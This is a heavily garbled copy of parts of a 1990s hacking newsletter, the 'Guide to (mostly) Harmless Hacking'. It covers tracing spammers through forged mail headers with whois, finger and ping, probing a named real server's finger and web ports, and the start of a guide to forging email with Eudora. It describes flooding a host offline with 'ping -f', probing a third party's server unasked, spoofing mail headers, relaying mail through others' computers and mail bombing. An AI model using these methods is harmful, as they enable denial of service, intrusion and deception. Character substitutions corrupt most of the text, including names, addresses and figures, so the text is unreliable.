Hrom: "etcom *buse 2e.artment ^abuseJnetcom&comV 5e.ly?#o: ^abuseJnetcom&comV Sub=ect: #hank you for your re.ort #hank you for your re.ort& We ha<e informed this user of our .olicies( and ha<e taken a..ro.riate action( u. to( and including cancellation of the account( de.ending on the .articular incident& 1f they continue to break "etcom .olicies we will take further action& #he following issues ha<e been dealt with: santigoJi'&netcom&com date?netJi'&netcom&com =hatemJi'&netcom&com kkooimJi'&netcom&com duffsterJi'&netcom&com s.ilamusJi'&netcom&com slathamJi'&netcom&com =walker5Ji'&netcom&com binaryJi'&netcom&com clauJi'&netcom&com frugalJi'&netcom&com magnetsJi'&netcom&com slistonJi'&netcom&com aessedaiJi'&netcom&com a=b,9EDJi'&netcom&com readmeJreadme&net ca.tain'Ji'&netcom&com carrielfJi'&netcom&com charleneJi'&netcom&com fonedudeJi'&netcom&com nickshnnJnetcom&com .ros.netJi'&netcom&com allu<ialJi'&netcom&com hiwaygoJi'&netcom&com falconGKJi'&netcom&com iggybooJi'&netcom&com =oyful%Ji'&netcom&com kncdJi'&netcom&com mailing,Ji'&netcom&com niterainJi'&netcom&com matty=oJi'&netcom&com

noonJi'&netcom&com rmerchJi'&netcom&com rthomas%Ji'&netcom&com r<aldes,Ji'&netcom&com sia,Ji'&netcom&com thyJi'&netcom&com <hs,Ji'&netcom&com Sorry for the length of the list& S.encer *buse 1n<estigator FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFF "3#/46 4nline /ommunication Ser<ices *buse 1ssues -G?hour Su..ort 7ine: GMD?9D%?59KM abuseJnetcom&com )))))))))))))) G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber 5 1t's <igilante .hun day again How get email s.ammers kicked off their 1S+s& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF So( ha<e you been out on 0senet blasting s.ammers? 1t's .hun( right? But if you ha<e e<er done much .osting to 0senet news grou.s( you will notice that soon after you .ost( you will often get s.am email& #his is mostly thanks to 7ightning Bolt( a .rogram written by Reff Slayton to stri. huge <olumes of email addresses from 0senet .osts& Here's one 1 recently got: 5ecei<ed:from mail&gnn&com !KM&los?angeles?%&ca&dial?access&att&net Y,E5&-%D&%D&KMZ$ by mail?e-b?ser<ice&gnn&com !D&K&,ID&E&9$ with S6#+ id B**,GE%EA Sat( ,K *ug ,99E M,:55:ME ?MGMM !32#$ 2ate: Sat( ,K *ug ,99E M,:55:ME ?MGMM !32#$ 6essage?1d: ^,99EMD,KM555&B**,GE%EJmail?e-b?ser<ice&gnn&comV #o:

Sub=ect: Hore<er Hrom: H533JHea<en&com :H533: House and lot in :H3*C3": 5eser<e yours now( do it today( do not wait& 1t is H533 =ust for the asking& ;ou recei<e a +ersonali>ed 2eed and detailed 6a. to your home in H3*C3"& Send your name and address along with a one time minimum donation of O,&9D cash( check( or money order to hel. co<er sIh cost #4: Saint +eter's 3states +&4& Bo' 9DEG Bakersfield(/* 9%%D9?9DEG #his is a gated community and it is :H533:& #otal satisfaction for - thousand years to date& VHrom the Gate 8ee.er& 9+S& See you at the +early Gates$ G42 will Bless you& "ow it is a .retty good guess that this s.am has a forged header& #o identify the cul.rit( we em.loy the same command that we used with 0senet s.am: whois hea<en&com We get the answer: #ime Warner /able Broadband *..lications !H3*C3"?246$ --,M W& 4li<e *<enue Burbank( /* 9,5ME 2omain "ame: H3*C3"&/46 *dministrati<e /ontact( #echnical /ontact( Qone /ontact( /ontact: 6elo( 6ichael !66G-D$ michaelJH3*C3"&/46 !D,D$ -95?EEK, Billing

5ecord last u.dated on M-?*.r?9E& 5ecord created on ,K?Run?9%& 2omain ser<ers in listed order: /H3U&H3*C3"&/46 "4/&/35H&"3# -ME&,K&,DM&,9-&,5%&,5E&--

VHrom this we conclude that this is either genuine !fat chance$ or a better forgery than most& So let's try to finger H533Jhea<en&com& Hirst( let's check out the return email address: finger H533Jhea<en&com We get: Yhea<en&comZ finger: hea<en&com: /onnection timed out #here are se<eral .ossible reasons for this& 4ne is that the systems administrator for hea<en&com has disabled the finger .ort& *nother is that hea<en&com is inacti<e& 1t could be on a host com.uter that is turned off( or maybe =ust an or.han& ))))))))))))))))))))) "ewbie note: ;ou can register domain names without setting them u. on a com.uter anywhere& ;ou =ust .ay your money and 1nternic( which registers domain names( will .ut it aside for your use& Howe<er( if you don't get it hosted by a com.uter on the 1nternet within a few weeks( you may loose your registration& ))))))))))))))))))))) We can test these hy.otheses with the .ing command& #his command tells you whether a com.uter is currently hooked u. to the 1nternet and how good its connection is& "ow .ing( like most kewl hacker tools( can be used for either information or as a means of attack& But 1 am going to make you wait in dire sus.ense for a later Guide to !mostly$ Harmless Hacking to tell you how some .eo.le use .ing& Besides( yes( it would be )illegal) to use .ing as a wea.on&

Because of .ing's .otential for mayhem( your shell account may ha<e disabled the use of .ing for the casual user& Hor e'am.le( with my 1S+ 1 ha<e to go to the right directory to use it& So 1 gi<e the command: IusrIetcI.ing hea<en&com #he result is: hea<en&com is ali<e ))))))))))))))))))))))) #echnical #i.: 4n some <ersions of 0ni'(gi<ing the command :.ing: will start your com.uter .inging the target o<er and o<er again without sto..ing& #o get out of the .ing command( hold down the control key and ty.e :c:& *nd be .atient( ne't Guide to !mostly$ Harmless Hacking will tell you more about the serious hacking uses of .ing& ))))))))))))))))))))))) Well( this answer means hea<en&com is hooked u. to the 1nternet right now& 2oes it allow logins? We test this with: telnet hea<en&com #his should get us to a screen that would ask us to gi<e user name and .assword& #he result is: #rying ,9D&,D-&-MM&, &&& telnet: connect: /onnection timed out 48( now we know that .eo.le can't remotely log in to hea<en&com& So it sure looks as if it was an unlikely .lace for the author of this s.am to ha<e really sent this email& How about che'&hea<en&com? 6aybe it is the .lace where s.am originated? 1 ty.e in: telnet che'&hea<en&com K9 #his is the finger .ort& 1 get:

#rying -ME&,K&,DM&- &&& telnet: connect: /onnection timed out 1 then try to get a screen that would ask me to login with user name( but once again get :/onnection timed out&: #his suggests strongly that neither hea<en&com or che'&hea<en&com are being used by .eo.le to send email& So this is .robably a forged link in the header& 7et's look at another link on the header: whois gnn&com #he answer is: *merica 4nline !G""-?246$ DE,9 Westwood /enter 2ri<e Cienna( C* --,D0S* 2omain "ame: G""&/46 *dministrati<e /ontact: /olella( 5ichard !5/,5MG$ colellaJ*47&"3# KM%?G5%?GG-K #echnical /ontact( Qone /ontact: 5unge( 6ichael !65,-ED$ rungeJ*47&"3# KM%?G5%?GG-M Billing /ontact: 7yons( 6arty !67G5$ martyJ*47&/46 KM%?G5%?GG,, 5ecord last u.dated on MK?6ay?9E& 5ecord created on --?Run?9%& 2omain ser<ers in listed order: 2"S?M,&G""&/46 2"S?*47&*"S&"3# -MG&,GD&9D&-G, ,9D&D%&-,M&-D

Whoa G""&com is owned by *merica 4nline& "ow *merica 4nline( like

/om.user<e( is a com.uter network of its own that has gateways into the 1nternet& So it isn't real likely that hea<en&com would be routing email through *47( is it? 1t would be almost like finding a header that claims its email was routed through the wide area network of some Hortune 5MM cor.oration& So this gi<es yet more e<idence that the first link in the header( hea<en&com( was forged& 1n fact( it's starting to look like a good bet that our s.ammer is some newbie who =ust graduated from *47 training wheels& Ha<ing decided there is money in forging s.am( he or she may ha<e gotten a shell account offered by the *47 subsidiary( G""& #hen with a shell account he or she could get seriously into forging email& Sounds logical( huh? *h( but let's not =um. to conclusions& #his is =ust a hy.othesis and it may be wrong& So let's check out the remaining link in this header: whois att&net #he answer is: *#N# 3asy7ink Ser<ices !*##-?246$ GMM 1nter.ace +kwy 5oom B%/-5 +arsi..any( "R MKM5G?,,,% 0S 2omain "ame: *##&"3# *dministrati<e /ontact( #echnical /ontact( Qone /ontact: 2"S #echnical Su..ort !2#S?45G$ hostmasterJ*##6*17&/46 %,G?5,9?5KMD Billing /ontact: Gardner( +at !+GK5E$ .egardnerJ*##6*17&/46 -M,?%%,?GG5% 5ecord last u.dated on -K?Run?9E& 5ecord created on ,%?2ec?9%& 2omain ser<ers in listed order:

45/0&45&B5&"+&37S?G6S&*##&"3#,99&,9,&,-9&,%9 W;/0&W;&B5&"+&37S?G6S&*##&"3#,99&,9,&,-D&G% 4H/0&4H&6#&"+&37S?G6S&*##&"3#,99&,9,&,GG&K5 6*/0&6*&6#&"+&37S?G6S&*##&"3#,99&,9,&,G5&,%E *nother <alid domain So this is a reasonably ingenious forgery& #he cul.rit could ha<e sent email from any of hea<en&com( gnn&com or att&net& We know hea<en&com is highly unlikely because we can't get e<en the login .ort to work& But we still ha<e gnn&com and att&net as sus.ected homes for this s.ammer& #he ne't ste. is to email a co.y of this s.am )including headers) to both .ostmasterJgnn&com !usually a good guess for the email address of the .erson who takes com.laints$ and rungeJ*47&"3#( who is listed by whois as the technical contact& We should also email either .ostmasterJatt&net !the good guess$ or hostmasterJ*##6*17&/46 !technical contact$& *lso email .ostmasterJhea<en&com( abuseJhea<en&com and rootJhea<en&com to let them know how their domain name is being used& +resumably one of the .eo.le reading email sent to these addresses will use the email message id number to look u. who forged this email& 4nce the cul.rit is disco<ered( he or she usually is kicked out of the 1S+& But here is a shortcut& 1f you ha<e been s.ammed by this guy( lots of other .eo.le .robably ha<e been( too& #here's a news grou. on the 0senet where .eo.le can e'change information on both email and 0senet s.ammers( news&admin&net?abuse&misc& 7et's .ay it a <isit and see what .eo.le may ha<e dug u. on H533Jhea<en&com& Sure enough( 1 find a .ost on this hea<en scam: Hrom: bartleymJhelium&iecor.&com !6att Bartley$ "ewsgrou.s: news&admin&net?abuse&misc Sub=ect: =unk email ? Hree B G 0 ? H533JHea<en&com Su.ersedes: ^Gu<@GaO%=uJhelium&iecor.&comV 2ate: ,5 *ug ,99E ,G:MD:GK ?MKMM 4rgani>ation: 1nterstate 3lectronics /or.oration 7ines: DK 6essage?12: ^G<M%k<OK%Jhelium&iecor.&comV ""#+?+osting?Host: helium&iecor.&com !sni.$

"o doubt a made?u. Hrom: header which ha..ened to hit a real domain name& +ostmasters at att&net( gnn&com and hea<en&com notified& gnn&com has already stated that it came from att&net( forged to look like it came from gnn& /learly the first 5ecei<ed: header is inconsistent& "ow we know that if you want to com.lain about this s.am( the best .lace to send a com.laint is .ostmasterJatt&net& But how well does writing a letter of com.laint actually work? 1 asked 1S+ owner 2ale *mon& He re.lied( :Hrom the small number of s.am messages 1 ha<e been seeing ? gi<en the number of generations of e'.onential net growth 1 ha<e seen in -M years ? the system a..ears to be )strongly) self regulating& Go<ernment and legal systems don't work nearly so well& :1 a..laud /arolyn's efforts in this area& She is absolutely right& S.ammers are controlled by the market& 1f enough .eo.le are annoyed( they res.ond& 1f that action causes .roblems for an 1S+ it .uts it in their economic interest to dro. customers who cause such harm( ie the s.ammers& 3conomic interest is often a far stronger and much more effecti<e incenti<e than legal re@uirement& :*nd remember that 1 say this as the #echnical 2irector of the largest 1S+ in "orthern 1reland&: How about suing s.ammers? +erha.s a bunch of us could get together a class action suit and dri<e these guys into bankru.tcy? Systems administrator #erry 6c1ntyre argues( :1 am o..osed to attem.ts to sue s.ammers& We already ha<e a fairly decent self?.olicing mechanism in .lace& :/onsidering that half of e<erybody on the internet are newbies !due to the ,MMP growth rate$( 1'd say that self?.olicing is mar<elously effecti<e& :1n<ite the go<'t to do our work for us( and some damn bureaucrats will write u. 5ules and 5egulations and +enalties and all of that nonsense& We ha<e enough of that in the world outside the 'netA let's not in<ite any of it to follow us onto the 'net&:

So it looks like 1nternet .rofessionals .refer to control s.am by ha<ing net <igilantes like us track down s.ammers and re.ort them to their 1S+s& Sounds like .hun to me 1n fact( it would be fair to say that without us net <igilantes( the 1nternet would .robably grind to a halt from the load these s.ammers would .lace on it&

G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber E 1tbs <igilante .hun day one more time How to nuke offensi<e Web sites& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF How do we deal with offensi<e Web sites? 5emember that the 1nternet is <oluntary& #here is no law that forces an 1S+ to ser<e .eo.le they donbt like& *s the s.am kings Reff Slayton( /ra>y 8e<in( and( oh( yes( the original s.am artists /antor and Siegal ha<e learned( life as a s.ammer is life on the run& #he same holds for Web sites that go o<er the edge& #he reason 1 bring this u. is that a Ha..y Hacker list member has told me he would like to <andali>e kiddie .orn sites& 1 think that is a really( really kewl idea ?? e'ce.t for one .roblem& ;ou can get thrown in =ail 1 donbt want the hacker tools you can .ick u. from .ublic Web and ft. sites to lure anyone into getting busted& 1t is easy to use them to <andali>e Web sites& But it is hard to use them without getting caught ))))))))))))))))) ;40 /*" G4 #4 R*17 "4#3: Getting into a .art of a com.uter that is not o.en to the .ublic is illegal& 1n addition( if you use the .hone lines or 1nternet across a 0S state line to break into a non?.ublic .art of a com.uter( you ha<e committed a Hederal felony& ;ou donbt ha<e to cause any harm at all ?? itbs still illegal& 3<en if you =ust gain root access and immediately break off your connection ?? itbs still illegal& 3<en if you are doing what you see as your ci<ic duty by <andali>ing kiddie .orn ?? itbs still illegal& )))))))))))))))

Herebs another .roblem& 1t took =ust two grouchy hacker guys to get the 2/? stuff list turned off & ;es( it )will) be back( e<entually& But what if the 1nternet were limited to carrying only stuff that was totally inoffensi<e to e<eryone? #hatbs why it is against the law to =ust nuke 1S+s and Web ser<ers you donbt like& Belie<e me( as you will soon find out( it is really easy to blow an 1nternet host off the 1nternet& 1t is )so) easy that doing this kind of stu.h is "4# elite So whatbs the legal alternati<e to fighting kiddie .orn? #rying to throw Web kiddie .orn guys in =ail doesnbt always work& While there are laws against it in the 0S( the .roblem is that the 1nternet is global& 6any countries ha<e no laws against kiddie .orn on the 1nternet& 3<en if it were illegal e<erywhere( in lots of countries the .olice only bust .eo.le in e'change for you .aying a bigger bribe than the criminal .ays& ))))))))))))))))))) #hey can go to =ail note: 1n the 0S and many other countries( kiddie .orn is illegal& 1f the imagery is hosted on a .hysical storage de<ice within the =urisdiction of a country with laws against it( the .erson who .uts this imagery on the storage de<ice can go to =ail& So if you know enough to hel. the authorities get a search warrant( by all means contact them& 1n the 0S( this would be the HB1& ))))))))))))))))))) But the kind of mass outrage that kee.s s.ammers on the run can also dri<e kiddie .orn off the Web& )We) ha<e the .ower& #he key is that no one can force an 1S+ to carry kiddie .orn ?? or anything else& 1n fact( most human beings are so disgusted at kiddie .orn that they will =um. at the chance to shut it down& 1f the 1S+ is run by some .er<ert who wants to make money by offering kiddie .orn( then you go to the ne't le<el u.( to the 1S+ that .ro<ides connecti<ity for the kiddie .orn 1S+& #here someone will be delighted to cut off the b)))))ds& So( how do you find the .eo.le who can .ut a Web site on the run? We start with the 057& 1 am going to use a real 057& But .lease kee. in mind that 1 am not saying this actually is a web address with kiddie .orn& #his is being used for .ur.oses of illustration only because this 057 is carried by a host with so many hackable features& 1t also( by at least some standards( carries U?rated material& So <isit it at your own risk&

htt.:IIwww&.hreak&org "ow letbs say someone =ust told you this was a kiddie .orn site& 2o you =ust launch an attack? "o& #his is how hacker wars start& What if .hreak&org is actually a nice guy .lace? 3<en if they did once dis.lay kiddie .orn( .erha.s they ha<e re.ented& "ot wanting to get caught acting on a stu.id rumor( 1 go to the Web and find the message `no 2"S entry&a So this Web site doesnbt look like itbs there =ust now& But it could =ust be the that the machine that runs the disk that holds this Web site is tem.orarily down& #here is a way to tell if the com.uter that ser<es a domain name is running: the .ing command: IusrIetcI.ing .hreak&org #he answer is: IusrIetcI.ing: unknown host .hreak&org "ow if this Web site had been u.( it would ha<e res.onded like my Web site does: IusrIetcI.ing techbroker&com #his gi<es the answer: techbroker&com is ali<e ))))))))))))))))))))))))) 3<il Genius "ote: +ing is a .owerful network diagnostic tool& #his e'am.le is from BS2 0ni'& Suarterdeck 1nternet Suite and many other software .ackages also offer this wim.y <ersion of the .ing command& But in its most .owerful form ?? which you can get by installing 7inu' on your com.uter ?? the .ing?f command will send out .ackets as fast as the target host can res.ond for an indefinite length of time& #his can kee. the target e'tremely busy and may be enough to .ut the com.uter out of action& 1f se<eral .eo.le do this simultaneously( the target host will almost certainly be unable to maintain its network connection& So ?? )now) do you want to install 7inu'?

))))))))))))))))))))))))) ))))))))))))))))))))))))) "eti@uette warning: `+inging downa a host is incredibly easy& 1tbs way too easy to be regarded as elite( so donbt do it to im.ress your friends& 1f you do it anyhow( be ready to be sued by the owner of your target and kicked off your 1S+?? or much worse 1f you should accidentally get the .ing command running in assault mode( you can @uickly turn it off by holding down the control key while .ressing the `ca key& ))))))))))))))))))))))))) ))))))))))))))))))))))))) ;ou can go to =ail warning: 1f it can be shown that you ran the .ing?f command on .ur.ose to take out the host com.uter you targeted( this is a denial of ser<ice attack and hence illegal& )))))))))))))))))))))))) 48( now we ha<e established that at least right now( htt.:II.hreak&com either does not e'ist( or else that the com.uter hosting it is not connected to the 1nternet& But is this tem.orary or is it gone( gone( gone? We can get some idea whether it has been u. and around and widely read from the search engine at htt.:IIalta<ista&digital&com& 1t is able to search for links embedded in Web .ages& *re there many Web sites with links to .hreak&org? 1 .ut in the search commands: link: htt.:IIwww&.hreak&org host: htt.:IIwww&.hreak&org But they turn u. nothing& So it looks like the .hreak&org site is not real .o.ular& Well( does .hreak&org ha<e a record at 1nternic? 7etbs try whois: whois .hreak&org +hreaks( 1nc& !+H53*8?246$ +hreaks( 1nc& ,%,% 6ockingbird 7ane San Rose( /* 95,%- 0S 2omain "ame: +H53*8&45G

*dministrati<e /ontact( Billing /ontact: /onnor( +atrick !+/E,$ .cJ+H53*8&45G !GMD$ -E-?G,G#echnical /ontact( Qone /ontact: Hall( Barbara !BH%GM$ rainJ+H53*8&45G GMD&-E-&G,G5ecord last u.dated on ME?Heb?9E& 5ecord created on %M?*.r?95& 2omain ser<ers in listed order: +/&+++&*B73/46&"3# -MG&K5&%%&%% *S;706&*S;706&45G -M5&-,K&G&,K "S&"3U/H1&"3# -MG&95&D&"e't 1 wait a few hours and .ing .hreak&org again& 1 disco<er it is now ali<e& So now we ha<e learned that the com.uter hosting .hreak&org is sometimes connected to the 1nternet and sometimes not& !1n fact( later .robing shows that it is often down&$ 1 try telnetting to their login se@uence: telnet .hreak&org #rying -MG&K5&%%&%% &&& /onnected to .hreak&org& 3sca.e character is 'BZ'&

FFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FF FFF FF TFF I I IFF FF TFF FFFFIFF _FF IIFIFFFFFFFFFFFFFFFFFFFF F FF IFI IF IFI IFF IFI IF FFI FF I_ _F (^ F FF TF FFFIF FF eI F FFFFIF FF I F F( FIF IFFF F FFF _ I_ _FFI IFI I I F IFI I IFI IFI IFI IFI _F_ IFFFFFI IFI _FIFI _F_!F$FFFFIIFI FTFF( I IFFFFI

A /onnection closed by foreign host&

*ha Someone has connected the com.uter hosting .hreak&org to the 1nternet #he fact that this gi<es =ust *S/11 art and no login .rom.t suggests that this host com.uter does not e'actly welcome the casual <isitor& 1t may well ha<e a firewall that re=ects attem.ted logins from anyone who telnets in from a host that is not on its a..ro<ed list& "e't 1 finger their technical contact: finger rainJ.hreak&org 1ts res.onse is: Y.hreak&orgZ 1t then scrolled out some embarrassing *S/11 art& Hinger it yourself if you really want to see it& 1bd only rate it +G?,%( howe<er& #he fact that .hreak&org runs a finger ser<ice is interesting& Since finger is one of the best ways to crack into a system( we can conclude that either: ,$ #he .hreak&org sysadmin is not <ery security?conscious( or -$ 1t is so im.ortant to .hreak&org to send out insulting messages that the sysadmin doesnbt care about the security risk of running finger& Since we ha<e seen e<idence of a fire wall( case - is .robably true& 4ne of the Ha..y Hacker list members who hel.ed me by re<iewing this Guide( William 5yan( decided to further .robe .hreak&orgbs finger .ort: `1 ha<e been .aying close attention to all of the :ha..y hacker: things that you ha<e .osted& When 1 tried using the .ort K9 method on .hreak&org( it connects and then dis.lays a hand with its middle finger raised and the comment :0+ ;405S&: When 1 tried using finger( 1 get logged on and a message is dis.layed shortly thereafter :1n real life???:a 4h( this is =ust )too) tem.ting&&&ah( but letbs kee. out of trouble and =ust lea<e that .ort K9 alone( 48?

"ow how about their H#67 .ort( which would .ro<ide access to any Web sites hosted by .hreak&org? We could =ust bring u. a Web surfing .rogram and take a look& But we are hackers and hackers ne<er do stu.h the ordinary way& Besides( 1 donbt want to <iew dirty .ictures and naughty words& So we check to see if it is acti<e with( you guessed it( a little .ort surfing: telnet .hreak&org DM Herebs what 1 get: #rying -MG&K5&%%&%% &&& /onnected to .hreak&org& 3sca.e character is 'BZ'& H##+I,&M GMM Bad 5e@uest Ser<er: thtt.dI,&MM /ontent?ty.e: te'tIhtml 7ast?modified: #hu( --?*ug?9E ,D:5G:-M G6# ^H#67V^H3*2V^#1#73VGMM Bad 5e@uest^I#1#73V^IH3*2V ^B42;V^H-VGMM Bad 5e@uest^IH-V ;our re@uest '' has bad synta' or is inherently im.ossible to satisfy& ^H5V ^*2253SSV^* H53HW:htt.:IIwww&acme&orgIsoftwareIthtt.dI:Vthtt.dI,&MM^I*V^I*2253S S ^IB42;V^IH#67V /onnection closed by foreign host& "ow we know that .hreak&org does ha<e a web ser<er on its host com.uter& #his ser<er is called thtt.d( <ersion ,&M& We also may sus.ect that it is a bit buggy What makes me think it is buggy? 7ook at the <ersion number: ,&M& *lso( thatbs a .retty weird error message& 1f 1 were the technical administrator for .hreak&org( 1 would get a better .rogram running on .ort DM before someone figures out how to break into root with it& #he .roblem is that buggy code is often a sym.tom of code that takes the la>y a..roach of using calls to root& 1n the case of a Web ser<er( you want to gi<e read?only access to remote users in any userbs directories of html files& So there is a huge tem.tation to use calls to root&

*nd a .rogram with calls to root =ust might crash and dum. you out into root& )))))))))))))))))))))))) "ewbie note: 5oot 1t is the Calhalla of the hard?core cracker& `5oota is the account on a multi?user com.uter which allows you to .lay god& ;ou become the `su.erusera 1t is the account from which you can enter and use any other account( read and modify any file( run any .rogram& With root access( you can com.letely destroy all data on boring&1S+&net or any other host on which you gain root& !1 am )not) suggesting that you do so $ ))))))))))))))))))))))))) 4h( this is =ust too tem.ting& 1 do one little e'.eriment: telnet .hreak&org DM #his gi<es: #rying -MG&K5&%%&%% &&& /onnected to .hreak&org& 3sca.e character is 'BZ'& Because the .rogram on .ort DM times out on commands in a second or less( 1 was set u. ready to do a .aste to host command( which @uickly inserted the following command: ^*2253SSV^* H53HW:htt.:IIwww&.hreak&orgIthtt.dI:Vthtt.dI,&MM^I*V^I*2253SS^IB4 2;V^IH#67V #his gi<es information on .hreak&orgbs .ort DM .rogram: H##+I,&M 5M, "ot 1m.lemented Ser<er: thtt.dI,&MM /ontent?ty.e: te'tIhtml 7ast?modified: #hu( --?*ug?9E ,9:G5:,5 G6# ^H#67V^H3*2V^#1#73V5M, "ot 1m.lemented^I#1#73V^IH3*2V ^B42;V^H-V5M, "ot 1m.lemented^IH-V #he re@uested method '^*2253SSV^*' is not im.lemented by this ser<er& ^H5V

^*2253SSV^* H53HW:htt.:IIwww&acme&orgIsoftwareIthtt.dI:Vthtt.dI,&MM^I*V^I*2253S S ^IB42;V^IH#67V /onnection closed by foreign host& *ll right( what is thtt.d? 1 do a @uick search on *lta<ista and get the answer: * small( .ortable( fast( and secure H##+ ser<er& #he tinyIturboIthrottling H##+ ser<er does not fork and is <ery careful about memory&&& But did the .rogrammer figure out how to do all this without calls to root? Rust for kicks 1 try to access the acme&org 057 and get the message `does not ha<e a 2"S entry&a So itbs off?line( too& But whois tells me it is registered with 1nternic& Hmm( this sounds e<en more like brand U software& *nd itbs running on a .ort& Break?in city What a tem.tation&&&arghhh&&& *lso( once again we see an interesting s.lit .ersonality& #he .hreak&org sysadmin cares enough about security to get a Web ser<er ad<ertised as `secure&a But that software shows ma=or sym.toms of being a security risk So what may we conclude? 1t looks like .hreak&org does ha<e a Web site& But it is only s.oradically connected to the 1nternet& "ow su..ose that we did find something seriously bad news at .hreak&org& Su..ose someone wanted to shut it down& *h?ah?ah( donbt touch that buggy .ort DM 4r that tem.ting .ort K9 +ing in moderation( only )))))))))))))))))))))))))))))))) ;ou can go to =ail note: *re you are as tem.ted as 1 am? #hese guys ha<e notorious cracker highway .ort K9 o.en( *"2 a buggy .ort DM But( once again( 1bm telling you( it is against the law to break into non?.ublic .arts of a com.uter& 1f you telnet o<er 0S state lines( it is a federal felony& 3<en if you think there is something illegal on that thtt.d ser<er( only someone armed with a search warrant has the right to look it o<er from the root account& )))))))))))))))))))))))))))))))) Hirst( if in fact there were a .roblem with .hreak&org !remember( this is =ust being used as an illustration$ 1 would email a com.laint to the technical and administrati<e contacts of the 1S+s that .ro<ide .hreak&orgbs connection to the 1nternet& So 1 look to see who they are:

whois +/&+++&*B73/46&"3# 1 get the res.onse: Y"o nameZ !+/,-?HS#$ Hostname: +/&+++&*B73/46&"3# *ddress: -MG&K5&%%&%% System: Sun GI,,M running Sun4S G&,&% 5ecord last u.dated on %M?*.r?95 1n this case( since there are no listed contacts( 1 would email .ostmasterJ*B73/46&"3#& 1 check out the ne't 1S+: whois *S;706&*S;706&45G *nd get: Y"o nameZ !*S;706G?HS#$ Hostname: *S;706&*S;706&45G *ddress: -M5&-,K&G&,K System: ? running ? 5ecord last u.dated on %M?*.r?9E& *gain( 1 would email .ostmasterJ*S;706&45G 1 check out the last 1S+: whois "S&"3U/H1&"3# *nd get: "3U0S?/hicago !B022H?HS#$ ,--% W "orth Shore( Suite ,3 /hicago( 17 EME-E

Hostname: "S&"3U/H1&"3# *ddress: -MG&95&D&System: Sun running 0ni' /oordinator: #orres( Walter !W#5,$ walter?tJ6S"&/46 %,-?%5-?,-MM 5ecord last u.dated on %,?2ec?95& So in this case 1 would email walter?tJ6S"&/46 with e<idence of the offending material& 1 would also email com.laints to .ostmasterJ+/&+++&*B73/46&"3# and .ostmasterJ *S;706&*S;706&45G& #hatbs it& 1nstead of waging escalating hacker wars that can end u. getting .eo.le thrown in =ail( document your .roblem with a Web site and ask those who ha<e the .ower to cut these guys off to do something& 5emember( you can hel. fight the bad guys of cybers.ace much better from your com.uter than you can from a =ail cell& ))))))))))))))))))))))))) "eti@uette alert: 1f you are =ust burning with curiosity about whether thtt.d can be made to crash to root( )24"b#) run e'.eriments on .hreak&orgbs com.uter& #he sysadmin will .robably notice all those weird accesses to .ort DM on the shell log file& He or she will .resume you are trying to break in( and will com.lain to your 1S+& ;ou will .robably lose your account& ))))))))))))))))))))))))) ))))))))))))))))))))))))) 3<il Genius note: #he sym.toms of being hackable that we see in thtt.d are the kind of intellectual challenge that calls for installing 7inu' on your +/& 4nce you get 7inu' u. you could install thtt.d& #hen you may e'.eriment with total im.unity& 1f you should find a bug in thtt.d that seriously com.romises the security of any com.uter running it( then what do you do? Wi.e the html files of .hreak&org? "4 ;ou contact the /om.uter 3mergency 5es.onse #eam !/35#$ at htt.:IIcert&org with this information& #hey will send out an alert& ;ou will become a hero and be able to charge big bucks as a com.uter security consultant& #his is much more .hun than going to =ail& #rust me&

)))))))))))))))))))))))) Guide to !mostly$ Harmless Hacking Col& , "o& K How to Horge 3mail 0sing 3udora +ro FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 4ne of the most .o.ular hacking tricks is forging email& +eo.le lo<e to fake out their friends by sending them email that looks like it is from BillFGatesJmicrosoft&com( santaJnorth&.ole&org( or beel>ebubJheck&mil& 0nfortunately( s.ammers and other undesirables also lo<e to fake email so itbs easy for them to get away with flooding our email accounts with =unk& #hanks to these .roblems( most email .rograms are good 1nternet citi>ens& +egasus( which runs on Windows( and +ine( which runs on 0ni'( are fastidious in kee.ing the .eo.le from misusing them& Ha<e you e<er tried to forge email using /om.user<e or *47? 1bm afraid to e<er say something is im.ossible to hack( but those email .rograms ha<e all resisted my attem.ts& 1 will admit that the screen name feature of *merica 4n7ine allows one to hide behind all sorts of handles& But for industrial strength email forging there is 3udora +ro for Windows 95( Sualcommbs gift to the 1nternet and the meanest( baddest email .rogram around& ))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1n this Guide you will learn how to use 3udora +ro to fake email& #his will include how to forge: L Who sent the mail L 3'tra headers to fake the route it took though the 1nternet L 3<en the message 12 L *nd anything else you can imagine L +lus( how to use 3udora for sending your email from other .eo.lebs com.uters ?? whether they like it or not& L +lus ?? is it .ossible to use 3udora for mail bombing? ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Some Su.er 2u.er ha'ors will see this cha.ter and immediately start making fun of it& #hey will assume 1 am =ust going to teach the ob<ious stuff( like how to .ut a fake sender on your email&

